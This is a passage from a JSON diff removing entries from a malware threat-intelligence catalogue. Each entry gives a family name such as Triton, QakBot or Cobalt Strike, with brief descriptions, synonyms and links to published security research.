However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.f-secure.com/weblog/archives/00002718.html" - ] - } - }, - { - "uuid": "3b6c1771-6d20-4177-8be0-12116e254bf5", - "value": "GhostCtrl", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/android-backdoor-ghostctrl-can-silently-record-your-audio-video-and-more/" - ] - } - }, - { - "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", - "value": "Jaku", - "description": "", - "meta": { - "synonyms": [ - "Reconcyc" - ], - "type": [], - "refs": [ - "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", - "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146" - ] - } - }, - { - "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", - "value": "win.triton", - "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.", - "meta": { - "synonyms": [ - "Trisis", - "HatMan" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", - "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", - "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://dragos.com/blog/trisis/TRISIS-01.pdf" - ] - } - }, - { - "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", - "value": "Helauto", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": 
"1eceb5c0-3a01-43c2-b204-9957b15cf763", - "value": "badflick", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - } - }, - { - "uuid": "b7dc52a1-7423-4a7a-a102-1df6122187ad", - "value": "DualToy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - } - }, - { - "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", - "value": "Lamdelin", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" - ] - } - }, - { - "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", - "value": "PC Surveillance System", - "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.", - "meta": { - "synonyms": [ - "PSS" - ], - "type": [], - "refs": [ - "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" - ] - } - }, - { - "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", - "value": "Kardon Loader", - "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. 
The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", - "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" - ] - } - }, - { - "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", - "value": "WebC2-Table", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", - "value": "Sedreco", - "description": "", - "meta": { - "synonyms": [ - "eviltoss", - "azzy" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" - ] - } - }, - { - "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", - "value": "Buhtrap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/" - ] - } - }, - { - "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", - "value": "MacRansom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x1E.html", - "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service" - ] - } - }, - { - "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", - "value": "Nagini", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" - ] - } - }, - { - "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", - "value": "OpGhoul", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" - ] - } - }, - { - "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", - "value": "Medre", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" - ] - } - }, - { - "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", - "value": "Shylock", - "description": "", - "meta": { - "synonyms": [ - "Caphaw" - ], - "type": [], - "refs": [ - "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", - "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", - "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", - "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", - "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", - "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" - ] - } - }, - { - "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", - "value": "ShellLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/813726714228604928" - ] - } - }, - { - "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", - "value": "Leverage", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis", - "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/" - ] - } - }, - { - "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", - "value": "Necurs", - 
"description": "", - "meta": { - "synonyms": [ - "nucurs" - ], - "type": [], - "refs": [ - "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", - "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", - "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", - "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", - "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/" - ] - } - }, - { - "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", - "value": "Philadephia Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", - "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", - "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", - "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", - "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" - ] - } - }, - { - "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", - "value": "Evilbunny", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cyphort.com/evilbunny-malware-instrumented-lua/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" - ] - } - }, - { - "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", - "value": "Cobalt Strike", - "description": "Cobalt 
Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/" - ] - } - }, - { - "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", - "value": "win.medusa", - "description": "Medusa is a DDoS bot written in .NET 2.0. 
In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", - "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", - "https://news.drweb.com/show/?i=10302&lng=en", - "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/" - ] - } - }, - { - "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", - "value": "HappyLocker (HiddenTear?)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", - "value": "win.glupteba", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://resources.infosecinstitute.com/tdss4-part-1/", - "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", - "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", - "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" - ] - } - }, - { - "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", - "value": "PoohMilk Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - } - }, - { - "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", - "value": "Romeo(Alfa,Bravo, ...)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", - "value": "xsPlus", - "description": "", - "meta": 
{ - "synonyms": [ - "nokian" - ], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", - "value": "Bouncer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", - "value": "Combojack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" - ] - } - }, - { - "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", - "value": "StarCruft", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/operation-daybreak/75100/" - ] - } - }, - { - "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", - "value": "Ruckguv", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" - ] - } - }, - { - "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", - "value": "DuQu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" - ] - } - }, - { - "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", - "value": "CryptoWire", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" - ] - } - }, - { - "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", - "value": "BfBot", - "description": 
"", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", - "value": "Chinad", - "description": "Adware that shows advertisements using plugin techniques for popular browsers", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", - "value": "AvastDisabler", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" - ] - } - }, - { - "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", - "value": "Lurk", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" - ] - } - }, - { - "uuid": "4df1b257-c242-46b0-b120-591430066b6f", - "value": "POSHSPY", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", - "https://github.com/matthewdunwoody/POSHSPY" - ] - } - }, - { - "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", - "value": "IsSpace", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - } - }, - { - "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", - "value": "QakBot", - "description": "", - "meta": { - "synonyms": [ - "Pinkslipbot", - "Qbot" - ], - "type": [], - "refs": [ - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "http://contagiodump.blogspot.com/2010/11/template.html", - "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", - 
"https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf" - ] - } - }, - { - "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", - "value": "Silon", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", - "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" - ] - } - }, - { - "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", - "value": "Tater PrivEsc", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/Kevin-Robertson/Tater" - ] - } - }, - { - "uuid": "8804e02c-a139-4c3d-8901-03302ca1faa0", - "value": "JadeRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.lookout.com/mobile-threat-jaderat" - ] - } - }, - { - "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", - "value": "Stealth Mango", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.lookout.com/info/stealth-mango-report-ty" - ] - } - }, - { - "uuid": "acdda3e5-e776-419b-b060-14f3406de061", - "value": "WebC2-DIV", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", - "value": "TeslaCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blogs.cisco.com/security/talos/teslacrypt", - "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", - "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", - 
"https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", - "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", - "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" - ] - } - }, - { - "uuid": "47b67fa4-f32e-4b6b-a32d-42c5ca0b8e9a", - "value": "Wirenet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", - "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] - } - }, - { - "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", - "value": "Mughthesec", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x20.html" - ] - } - }, - { - "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", - "value": "Uiwix", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" - ] - } - }, - { - "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", - "value": "Goggles", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", - "value": "Maktub", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/", - "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", - "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" - ] - } - }, - { - "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", - "value": "Skyplex", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": 
"d6178858-1244-41cf-aeed-8c6afc1d6846", - "value": "Slingshot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", - "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" - ] - } - }, - { - "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", - "value": "OceanLotus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" - ] - } - }, - { - "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", - "value": "Rincux", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", - "value": "BetaBot", - "description": "", - "meta": { - "synonyms": [ - "Neurevt" - ], - "type": [], - "refs": [ - "https://medium.com/@woj_ciech/betabot-still-alive-with-multi-stage-packing-fbe8ef211d39", - "https://www.ccn-cert.cni.es/seguridad-al-dia/comunicados-ccn-cert/6087-betabot-y-fleercivet-dos-nuevos-informes-de-codigo-danino-del-ccn-cert.html", - "http://www.xylibox.com/2015/04/betabot-retrospective.html", - "http://resources.infosecinstitute.com/beta-bot-analysis-part-1/#gref", - "https://www.arbornetworks.com/blog/asert/beta-bot-a-code-review/", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/BetaBot.pdf?la=en", - "http://www.malwaredigger.com/2013/09/how-to-extract-betabot-config-info.html" - ] - } - }, - { - "uuid": 
"947dffa1-0184-48d4-998e-1899ad97e93e", - "value": "Babar", - "description": "", - "meta": { - "synonyms": [ - "SNOWBALL" - ], - "type": [], - "refs": [ - "http://www.spiegel.de/media/media-35683.pdf", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", - "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/" - ] - } - }, - { - "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", - "value": "Alina POS", - "description": "", - "meta": { - "synonyms": [ - "alina_spark", - "katrina", - "alina_eagle" - ], - "type": [], - "refs": [ - "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", - "https://www.nuix.com/blog/alina-continues-spread-its-wings", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/" - ] - } - }, - { - "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", - "value": "Vobfus", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" - ] - } - }, - { - "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", - "value": "Pony", - "description": "", - "meta": { - "synonyms": [ - "Fareit" - ], - "type": [], - "refs": [ - 
"https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", - "https://github.com/nyx0/Pony" - ] - } - }, - { - "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", - "value": "Banjori", - "description": "", - "meta": { - "synonyms": [ - "MultiBanker 2", - "BankPatch", - "BackPatcher" - ], - "type": [], - "refs": [ - "http://blog.kleissner.org/?p=69", - "http://blog.kleissner.org/?p=192", - "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" - ] - } - }, - { - "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", - "value": "TeleDoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", - "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" - ] - } - }, - { - "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", - "value": "Hacksfase", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", - "value": "HackSpy", - "description": "Py2Exe based tool as found on github.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/ratty3697/HackSpy-Trojan-Exploit" - ] - } - }, - { - "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", - "value": "Bart", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", - "value": "Fireball", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" - ] - } - }, - { - "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", - "value": "StarLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - } - }, - { - "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", - "value": "MadMax", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/mad-max-dga/" - ] - } - }, - { - "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", - "value": "scanbox", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", - "http://resources.infosecinstitute.com/scanbox-framework/" - ] - } - }, - { - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", - "https://twitter.com/PhysicalDrive0/status/845009226388918273", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf" - ] - } - }, - { - "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", - "value": "Mirage", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" - ] - } - }, - { - "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", - "value": "FastPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", - "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf", - "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" - ] - } - }, - { - "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", - "value": "ArdaMax", - 
"description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "4c74c8e1-869e-46a5-b050-e5a551484adc", - "value": "Razy", - "description": "", - "meta": { - "synonyms": [ - "xcmkds" - ], - "type": [], - "refs": [ - "https://twitter.com/JaromirHorejsi/status/816915354698076161" - ] - } - }, - { - "uuid": "2c672b27-bc65-48ba-ba3d-6318473e78b6", - "value": "Catelites", - "description": "Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan, with ties to CronBot. Once the malicious app is installed, attackers use social engineering tricks and window overlays to get credit card details from the victim.\r\nThe distribution vector seems to be fake apps from third-party app stores (not Google Play) or via malvertisement. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. Furthermore, the malware sends a fake system notification, telling the victim that they need to re-authenticate with Google Services and ask for their credit card details to be entered.\r\nCurrently the malware has overlays for over 2,200 apps of banks and financial institutions.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.avast.com/new-version-of-mobile-malware-catelites-possibly-linked-to-cron-cyber-gang", - "https://www.youtube.com/watch?v=1LOy0ZyjEOk" - ] - } - }, - { - "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", - "value": "Unidentified 038", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", - "value": "ShadowPad", - "description": "", - "meta": { - "synonyms": [ - "XShellGhost" - ], - "type": [], - "refs": [ - 